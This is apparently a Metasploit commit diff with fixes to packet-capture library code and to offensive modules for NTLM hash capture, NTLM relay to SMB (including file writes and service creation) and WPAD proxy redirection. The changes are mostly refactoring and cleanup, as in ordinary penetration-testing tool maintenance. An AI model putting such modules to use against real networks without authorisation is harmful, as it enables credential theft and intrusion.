Land rapid7#2464, fixes for llmnr_response and friends

Fixed conflict in lib/msf/core/exploit/http/server.rb.

Author: wvu

lib/msf/core/exploit/capture.rb

@@ -48,15 +48,15 @@ def initialize(info = {})
         begin
           require 'pcaprub'
           @pcaprub_loaded = true
-        rescue ::Exception => e
+        rescue ::LoadError => e
           @pcaprub_loaded = false
           @pcaprub_error  = e
         end
 
         begin
           require 'network_interface'
           @network_interface_loaded = true
-        rescue ::Exception => e
+        rescue ::LoadError => e
           @network_interface_loaded = false
           @network_interface_error  = e
         end
@@ -97,7 +97,7 @@ def open_pcap(opts={})
         len = (opts['SNAPLEN'] || datastore['SNAPLEN'] || 65535).to_i
         tim = (opts['TIMEOUT'] || datastore['TIMEOUT'] || 0).to_i
         fil = opts['FILTER'] || datastore['FILTER']
-        arp = opts['ARPCAP'] || true
+        do_arp = (opts['ARPCAP'] == false) ? false : true
 
         # Look for a PCAP file
         cap = datastore['PCAPFILE'] || ''
@@ -115,7 +115,7 @@ def open_pcap(opts={})
           end
 
           self.capture = ::Pcap.open_live(dev, len, true, tim)
-          if arp
+          if do_arp
             self.arp_capture = ::Pcap.open_live(dev, 512, true, tim)
             preamble         = datastore['UDP_SECRET'].to_i
             arp_filter       = "arp[6:2] = 2 or (udp[8:4] = #{preamble})"
@@ -125,7 +125,7 @@ def open_pcap(opts={})
 
         if (not self.capture)
           raise RuntimeError, "Could not start the capture process"
-        elsif (arp and !self.arp_capture and cap.empty?)
+        elsif (do_arp and !self.arp_capture and cap.empty?)
           raise RuntimeError, "Could not start the ARP capture process"
         end
 
@@ -141,7 +141,6 @@ def close_pcap
 
       def capture_extract_ies(raw)
         set = {}
-        ret = 0
         idx = 0
         len = 0
 
@@ -279,7 +278,7 @@ def inject_reply(proto=:udp, pcap=self.capture)
       # This ascertains the correct Ethernet addresses one should use to
       # ensure injected IP packets actually get where they are going, and
       # manages the self.arp_cache hash. It always uses self.arp_capture
-      # do inject and capture packets, and will always first fire off a
+      # to inject and capture packets, and will always first fire off a
       # UDP packet using the regular socket to learn the source host's
       # and gateway's mac addresses.
       def lookup_eth(addr=nil, iface=nil)
@@ -309,7 +308,15 @@ def probe_gateway(addr)
         dst_port = rand(30000)+1024
         preamble = [datastore['UDP_SECRET']].pack("N")
         secret   = "#{preamble}#{Rex::Text.rand_text(rand(0xff)+1)}"
-        UDPSocket.open.send(secret, 0, dst_host, dst_port)
+
+        begin
+          UDPSocket.open.send(secret, 0, dst_host, dst_port)
+        rescue Errno::ENETUNREACH
+          # This happens on networks with no gatway. We'll need to use a
+          # fake source hardware address.
+          self.arp_cache[Rex::Socket.source_address(addr)] = "00:00:00:00:00:00"
+        end
+
         begin
           to = (datastore['TIMEOUT'] || 1500).to_f / 1000.0
           ::Timeout.timeout(to) do
@@ -415,7 +422,7 @@ def should_arp?(ip)
 
       attr_accessor :capture, :arp_cache, :arp_capture, :dst_cache
 
-      #Netifaces code
+      # Netifaces code
 
       def netifaces_implemented?
         @network_interface_loaded and
@@ -486,8 +493,8 @@ def get_ipv4_addr(dev, num=0)
         check_pcaprub_loaded
         dev   = get_interface_guid(dev)
         addrs = NetworkInterface.addresses(dev)
-        raise RuntimeError, "Interface #{dev} do not exists" if !addrs
-        raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[NetworkInterface::AF_INET].length < num + 1
+        raise RuntimeError, "Interface #{dev} does not exist" if !addrs
+        raise RuntimeError, "Interface #{dev} does not have an ipv4 address at position #{num}" if addrs[NetworkInterface::AF_INET].length < num + 1
         raise RuntimeError, "Can not get the IPv4 address for interface #{dev}" if !addrs[NetworkInterface::AF_INET][num]['addr']
         addrs[NetworkInterface::AF_INET][num]['addr']
       end
@@ -496,8 +503,8 @@ def get_ipv4_netmask(dev, num=0)
         check_pcaprub_loaded
         dev   = get_interface_guid(dev)
         addrs = NetworkInterface.addresses(dev)
-        raise RuntimeError, "Interface #{dev} do not exists" if !addrs
-        raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[NetworkInterface::AF_INET].length < num + 1
+        raise RuntimeError, "Interface #{dev} does not exist" if !addrs
+        raise RuntimeError, "Interface #{dev} does not have an ipv4 address at position #{num}" if addrs[NetworkInterface::AF_INET].length < num + 1
         raise RuntimeError, "Can not get IPv4 netmask for interface #{dev}" if !addrs[NetworkInterface::AF_INET][num]['netmask']
         addrs[NetworkInterface::AF_INET][num]['netmask']
       end

lib/msf/core/exploit/http/server.rb

@@ -700,7 +700,7 @@ def obfuscate_js(javascript, opts)
   # Returns a string containing the encrypted string and a loader
   #
   def encrypt_js(javascript, key)
-    js_encoded = Rex::Exploitation::EncryptJS.encrypt(javascript, key)
+    Rex::Exploitation::EncryptJS.encrypt(javascript, key)
   end
 
   #

modules/auxiliary/server/capture/http_ntlm.rb

@@ -58,18 +58,24 @@ def initialize(info = {})
   end
 
   def on_request_uri(cli, request)
-    print_status("Request '#{request.uri}'...")
+    vprint_status("Request '#{request.uri}'")
 
     case request.method
     when 'OPTIONS'
       process_options(cli, request)
     else
       # If the host has not started auth, send 401 authenticate with only the NTLM option
       if(!request.headers['Authorization'])
+        vprint_status("401 '#{request.uri}'")
         response = create_response(401, "Unauthorized")
         response.headers['WWW-Authenticate'] = "NTLM"
+        response.headers['Proxy-Support'] = 'Session-Based-Authentication'
+        response.body =
+          "<HTML><HEAD><TITLE>You are not authorized to view this page</TITLE></HEAD></HTML>"
+
         cli.send_response(response)
       else
+        vprint_status("Continuing auth '#{request.uri}'")
         method,hash = request.headers['Authorization'].split(/\s+/,2)
         # If the method isn't NTLM something odd is goign on. Regardless, this won't get what we want, 404 them
         if(method != "NTLM")
@@ -142,7 +148,7 @@ def handle_auth(cli,hash)
       nt_len = ntlm_hash.length
 
       if nt_len == 48 #lmv1/ntlmv1 or ntlm2_session
-        arg = {	:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
+        arg = { :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
           :lm_hash => lm_hash,
           :nt_hash => ntlm_hash
         }
@@ -153,11 +159,11 @@ def handle_auth(cli,hash)
       #if the length of the ntlm response is not 24 then it will be bigger and represent
       # a ntlmv2 response
       elsif nt_len > 48 #lmv2/ntlmv2
-        arg = {	:ntlm_ver 		=> NTLM_CONST::NTLM_V2_RESPONSE,
-          :lm_hash 		=> lm_hash[0, 32],
-          :lm_cli_challenge 	=> lm_hash[32, 16],
-          :nt_hash 		=> ntlm_hash[0, 32],
-          :nt_cli_challenge 	=> ntlm_hash[32, nt_len  - 32]
+        arg = { :ntlm_ver   => NTLM_CONST::NTLM_V2_RESPONSE,
+          :lm_hash   => lm_hash[0, 32],
+          :lm_cli_challenge  => lm_hash[32, 16],
+          :nt_hash   => ntlm_hash[0, 32],
+          :nt_cli_challenge  => ntlm_hash[32, nt_len  - 32]
         }
       elsif nt_len == 0
         print_status("Empty hash from #{host} captured, ignoring ... ")
@@ -335,7 +341,7 @@ def html_get_hash(arg = {})
         :active => true
       )
       #if(datastore['LOGFILE'])
-      #	File.open(datastore['LOGFILE'], "ab") {|fd| fd.puts(capturelogmessage + "\n")}
+      #  File.open(datastore['LOGFILE'], "ab") {|fd| fd.puts(capturelogmessage + "\n")}
       #end
 
       if(datastore['CAINPWFILE'] and user)

modules/auxiliary/server/http_ntlmrelay.rb

@@ -89,7 +89,6 @@ def on_request_uri(cli, request)
     when 'OPTIONS'
       process_options(cli, request)
     else
-      datastore['REQUEST_IP'] = cli.peerhost
       cli.keepalive = true;
 
       # If the host has not started auth, send 401 authenticate with only the NTLM option
@@ -235,10 +234,10 @@ def parse_args()
       print_error("PUTDATA and FILEPUTDATA cannot both contain data")
       raise ArgumentError
     elsif datastore['PUTDATA'] != nil
-      datastore['FINALPUTDATA'] = datastore['PUTDATA']
+      @finalputdata = datastore['PUTDATA']
     elsif datastore['FILEPUTDATA'] != nil
       f = File.open(datastore['FILEPUTDATA'], "rb")
-      datastore['FINALPUTDATA'] = f.read
+      @finalputdata = f.read
       f.close
     end
 
@@ -272,7 +271,7 @@ def http_relay_toserver(hash, ser_sock = nil)
 
     if (method == 'POST')
       theaders << 'Content-Length: ' <<
-        (datastore['FINALPUTDATA'].length + 4).to_s()<< "\r\n"
+        (@finalputdata.length + 4).to_s()<< "\r\n"
     end
 
     # HTTP_HEADERFILE is how this module supports cookies, multipart forms, etc
@@ -295,10 +294,10 @@ def http_relay_toserver(hash, ser_sock = nil)
     'method'  => method,
     'version' => '1.1',
     }
-    if (datastore['FINALPUTDATA'] != nil)
+    if (@finalputdata != nil)
       #we need to get rid of an extra "\r\n"
       theaders = theaders[0..-3]
-      opts['data'] = datastore['FINALPUTDATA'] << "\r\n\r\n"
+      opts['data'] = @finalputdata << "\r\n\r\n"
     end
     opts['SSL'] = true if datastore["RSSL"]
     opts['raw_headers'] = theaders
@@ -324,12 +323,12 @@ def http_relay_toserver(hash, ser_sock = nil)
   #relay ntlm type1 message for SMB
   def smb_relay_toservert1(hash)
     rsock = Rex::Socket::Tcp.create(
-      'PeerHost' 	=> datastore['RHOST'],
-      'PeerPort'	=> datastore['RPORT'],
-      'Timeout'	=> 3,
-      'Context'	=>
+      'PeerHost' => datastore['RHOST'],
+      'PeerPort' => datastore['RPORT'],
+      'Timeout'  => 3,
+      'Context'  =>
         {
-          'Msf'		=> framework,
+          'Msf'       => framework,
           'MsfExploit'=> self,
         }
     )
@@ -354,7 +353,7 @@ def smb_relay_toservert1(hash)
 
     begin
       #lazy ntlmsspblob extraction
-      ntlmsspblob =	'NTLMSSP' <<
+      ntlmsspblob = 'NTLMSSP' <<
               (resp.to_s().split('NTLMSSP')[1].split("\x00\x00Win")[0]) <<
               "\x00\x00"
     rescue ::Exception => e
@@ -367,7 +366,7 @@ def smb_relay_toservert1(hash)
 
   #relay ntlm type3 SMB message
   def smb_relay_toservert3(hash, ser_sock)
-    arg = get_hash_info(hash)
+    #arg = get_hash_info(hash)
     dhash = Rex::Text.decode_base64(hash)
 
     #Create a GSS blob for ntlmssp type 3 message, encoding the passed hash
@@ -424,7 +423,7 @@ def smb_put(ser_sock)
     ser_sock.client.tree_connect(share)
 
     fd = ser_sock.open("\\#{path}", 'rwct')
-    fd << datastore['FINALPUTDATA']
+    fd << @finalputdata
     fd.close
 
     logdata = "File \\\\#{datastore['RHOST']}\\#{datastore['RURIPATH']} written"
@@ -536,7 +535,7 @@ def smb_pwn(ser_sock, cli_sock)
         response = dcerpc.call(0x0c, stubdata)
         if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
             svc_handle = dcerpc.last_response.stub_data[0,20]
-            svc_status = dcerpc.last_response.stub_data[24,4]
+            #svc_status = dcerpc.last_response.stub_data[24,4]
         end
     rescue ::Exception => e
         print_error("Error: #{e}")
@@ -627,7 +626,7 @@ def get_hash_info(type3_hash)
     nt_len = ntlm_hash.length
 
     if nt_len == 48 #lmv1/ntlmv1 or ntlm2_session
-      arg = {	:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
+      arg = { :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
         :lm_hash => lm_hash,
         :nt_hash => ntlm_hash
       }
@@ -638,11 +637,11 @@ def get_hash_info(type3_hash)
     #if the length of the ntlm response is not 24 then it will be bigger and represent
     #a ntlmv2 response
     elsif nt_len > 48 #lmv2/ntlmv2
-      arg = {	:ntlm_ver 		=> NTLM_CONST::NTLM_V2_RESPONSE,
-        :lm_hash 		=> lm_hash[0, 32],
-        :lm_cli_challenge 	=> lm_hash[32, 16],
-        :nt_hash 		=> ntlm_hash[0, 32],
-        :nt_cli_challenge 	=> ntlm_hash[32, nt_len  - 32]
+      arg = { :ntlm_ver   => NTLM_CONST::NTLM_V2_RESPONSE,
+        :lm_hash          => lm_hash[0, 32],
+        :lm_cli_challenge => lm_hash[32, 16],
+        :nt_hash          => ntlm_hash[0, 32],
+        :nt_cli_challenge => ntlm_hash[32, nt_len  - 32]
       }
     elsif nt_len == 0
       print_status("Empty hash from #{host} captured, ignoring ... ")

modules/auxiliary/server/wpad.rb

@@ -33,7 +33,6 @@ def initialize(info = {})
 
     register_options(
       [
-        OptEnum.new('TYPE', [true, 'WPAD/PAC Data File', 'DAT', ['DAT', 'PAC']]),
         OptAddress.new('EXCLUDENETWORK', [ true, "Network to exclude",'127.0.0.1' ]),
         OptAddress.new('EXCLUDENETMASK', [ true, "Netmask to exclude",'255.255.255.0' ]),
         OptAddress.new('PROXY', [ true, "Proxy to redirect traffic to", '0.0.0.0' ]),
@@ -44,15 +43,10 @@ def initialize(info = {})
   end
 
 
-  def cleanup
-    datastore['URIPATH'] = @previous_uri
-  end
-
-
   def on_request_uri(cli, request)
-    print_status("Request '#{request.method} #{request.headers['user-agent']}")
+    vprint_status("Request '#{request.method} #{request.headers['user-agent']}")
 
-    return if request.method == "POST"
+    return send_not_found(cli) if request.method == "POST"
 
     html = <<-EOS
 function FindProxyForURL(url, host) {
@@ -65,20 +59,23 @@ def on_request_uri(cli, request)
    }
 EOS
 
-    print_status("Sending WPAD config ...")
+    print_status("Sending WPAD config")
     send_response_html(cli, html,
       {
         'Content-Type' => 'application/x-ns-proxy-autoconfig'
       })
   end
 
+  def resource_uri
+    "/wpad.dat"
+  end
 
-  def run
-    @previous_uri = datastore['URIPATH']
-    datastore['URIPATH'] = (datastore['TYPE'] == 'DAT') ? 'wpad.dat' : 'proxy.pac'
-
-    print_status("Serving #{datastore['URIPATH']} on port #{datastore['SRVPORT']}")
+  def primer
+    hardcoded_uripath("/proxy.pac")
+  end
 
+  def run
+    # This should probably be added to the Http mixin's run method
     begin
       exploit
     rescue Errno::EACCES => e